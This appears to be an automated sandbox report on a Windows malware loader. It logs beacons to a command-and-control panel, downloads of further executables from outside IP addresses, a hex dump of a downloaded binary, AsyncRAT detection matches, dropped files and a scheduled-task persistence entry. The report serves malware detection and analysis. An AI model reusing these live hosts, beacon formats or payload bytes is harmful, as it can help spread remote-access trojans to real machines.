00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 17:08:40 GMTContent-Type: application/octet-streamContent-Length: 1848320Last-Modified: Sat, 30 Nov 2024 16:25:11 GMTConnection: keep-aliveETag: "674b3c67-1c3400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 42 33 47 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e6 03 00 00 c0 00 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 49 00 00 04 00 00 64 8a 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 60 05 00 70 00 00 00 00 50 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 05 00 00 10 00 00 00 58 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 50 05 00 00 02 00 00 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 05 00 00 02 00 00 00 6a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 70 05 00 00 02 00 00 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6e 79 79 69 6a 75 74 00 a0 19 00 00 b0 2f 00 00 a0 19 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 72 73 6f 7a 6d 77 00 10 00 00 00 50 49 00 00 04 00 00 00 0e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 49 00 00 22 00 00 00 12 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 45 37 33 42 34 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB42E73B45C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: GET /files/1824233174/cAvEmnl.exe HTTP/1.1Host: 31.41.244.11
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 36 39 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010698001&unit=246122658369
                    Source: global trafficHTTP traffic detected: GET /files/1824233174/EJQ2xs8.exe HTTP/1.1Host: 31.41.244.11
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 37 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010706001&unit=246122658369
                    Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 30 Nov 2024 16:25:11 GMTIf-None-Match: "674b3c67-1c3400"
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 31 30 37 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1010714001&unit=246122658369
                    Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: Joe Sandbox ViewASN Name: PLI-ASCH PLI-ASCH
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49805 -> 31.41.244.11:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49775 -> 31.41.244.11:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49823 -> 185.215.113.16:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49837 -> 185.215.113.16:80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FABE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_00FABE30
                    Source: global trafficHTTP traffic detected: GET /files/1824233174/cAvEmnl.exe HTTP/1.1Host: 31.41.244.11
                    Source: global trafficHTTP traffic detected: GET /files/1824233174/EJQ2xs8.exe HTTP/1.1Host: 31.41.244.11
                    Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 30 Nov 2024 16:25:11 GMTIf-None-Match: "674b3c67-1c3400"
                    Source: unknownHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/S
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce9024154m
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/fac00b58987e8e7e7b9ca30804042ba5ce9-1002
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe
                    Source: skotes.exe, 00000006.00000002.2896207218.000000000159A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe/185.215.113.16/luma/random.exeSSC:
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe1010714001
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe61
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe714001
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe8(
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe9
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exeAppData
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exeAppDataBs
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exeLMEMPp
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exeO
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exeT
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exea5
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exelencoded
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exeo
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exep
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001657000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2896207218.00000000015D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/luma/random.exe450
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php6
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpN
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpV
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpd
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpj
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1824233174/EJQ2xs8.exe
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1824233174/EJQ2xs8.exeXYZ0123456789
                    Source: skotes.exe, 00000006.00000002.2896207218.00000000015C0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2896207218.00000000015ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1824233174/cAvEmnl.exe
                    Source: skotes.exe, 00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1824233174/cAvEmnl.exeNsz
                    Source: skotes.exe, 00000006.00000002.2896207218.00000000015ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1824233174/cAvEmnl.exeXYZ0123456789
                    Source: cAvEmnl.exe, 00000007.00000002.2895978891.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                    System Summary

                    barindex
                    Source: 12.2.EJQ2xs8.exe.7d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 7.0.cAvEmnl.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000007.00000000.2443615567.00000000000E8000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000000C.00000003.2616843347.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000000C.00000002.2621060775.00000000007D2000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\github.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: cAvEmnl[1].exe.6.drStatic PE information: section name: U@7'
                    Source: cAvEmnl.exe.6.drStatic PE information: section name: U@7'
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name:
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name: .idata
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: section name:
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name:
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name: .idata
                    Source: EJQ2xs8.exe.6.drStatic PE information: section name:
                    Source: random[1].exe.6.drStatic PE information: section name:
                    Source: random[1].exe.6.drStatic PE information: section name: .idata
                    Source: random[1].exe.6.drStatic PE information: section name:
                    Source: github.exe.7.drStatic PE information: section name: U@7'
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FAE5306_2_00FAE530
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FE78BB6_2_00FE78BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FE88606_2_00FE8860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FE70496_2_00FE7049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FA4DE06_2_00FA4DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FE31A86_2_00FE31A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FE2D106_2_00FE2D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FE779B6_2_00FE779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FA4B306_2_00FA4B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FD7F366_2_00FD7F36
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeCode function: 7_2_00007FFD9BAC11C87_2_00007FFD9BAC11C8
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeCode function: 7_2_00007FFD9BAC79067_2_00007FFD9BAC7906
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeCode function: 7_2_00007FFD9BAC0F287_2_00007FFD9BAC0F28
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeCode function: 7_2_00007FFD9BAC86B27_2_00007FFD9BAC86B2
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeCode function: 7_2_00007FFD9BAC74097_2_00007FFD9BAC7409
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeCode function: 7_2_00007FFD9BAC55FD7_2_00007FFD9BAC55FD
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeCode function: 7_2_00007FFD9BAC45D87_2_00007FFD9BAC45D8
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeCode function: 7_2_00007FFD9BAC60DD7_2_00007FFD9BAC60DD
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeCode function: 7_2_00007FFD9BAC2E687_2_00007FFD9BAC2E68
                    Source: C:\Users\user\AppData\Roaming\github.exeCode function: 10_2_00007FFD9BAC1BAE10_2_00007FFD9BAC1BAE
                    Source: C:\Users\user\AppData\Roaming\github.exeCode function: 10_2_00007FFD9BAC10A010_2_00007FFD9BAC10A0
                    Source: C:\Users\user\AppData\Roaming\github.exeCode function: 10_2_00007FFD9BAC111810_2_00007FFD9BAC1118
                    Source: C:\Users\user\AppData\Roaming\github.exeCode function: 10_2_00007FFD9BAC10F210_2_00007FFD9BAC10F2
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeCode function: 12_2_0508103012_2_05081030
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exe 5A09D23637929D77E9C04322D800690BC6E7272E0755843F387C37B99F452FB8
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe 5A09D23637929D77E9C04322D800690BC6E7272E0755843F387C37B99F452FB8
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 12.2.EJQ2xs8.exe.7d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 7.0.cAvEmnl.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000006.00000002.2896207218.0000000001608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000000.2443615567.00000000000E8000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000C.00000003.2616843347.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000C.00000002.2621060775.00000000007D2000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Roaming\github.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9982810371253406
                    Source: file.exeStatic PE information: Section: yguzlnpo ZLIB complexity 0.9946524127818404
                    Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9982810371253406
                    Source: skotes.exe.0.drStatic PE information: Section: yguzlnpo ZLIB complexity 0.9946524127818404
                    Source: cAvEmnl[1].exe.6.drStatic PE information: Section: U@7' ZLIB complexity 1.0007672991071428
                    Source: cAvEmnl.exe.6.drStatic PE information: Section: U@7' ZLIB complexity 1.0007672991071428
                    Source: EJQ2xs8[1].exe.6.drStatic PE information: Section: dvpnmyli ZLIB complexity 0.9949074161862864
                    Source: EJQ2xs8.exe.6.drStatic PE information: Section: dvpnmyli ZLIB complexity 0.9949074161862864
                    Source: random[1].exe.6.drStatic PE information: Section: ZLIB complexity 0.9976822916666667
                    Source: random[1].exe.6.drStatic PE information: Section: enyyijut ZLIB complexity 0.994750381097561
                    Source: github.exe.7.drStatic PE information: Section: U@7' ZLIB complexity 1.0007672991071428
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/12@0/4
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cAvEmnl[1].exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1010706001\EJQ2xs8.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exeMutant created: \Sessions\1\BaseNamedObjects\aKo7AtdK4OEvATqs
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: EJQ2xs8.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: EJQ2xs8.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
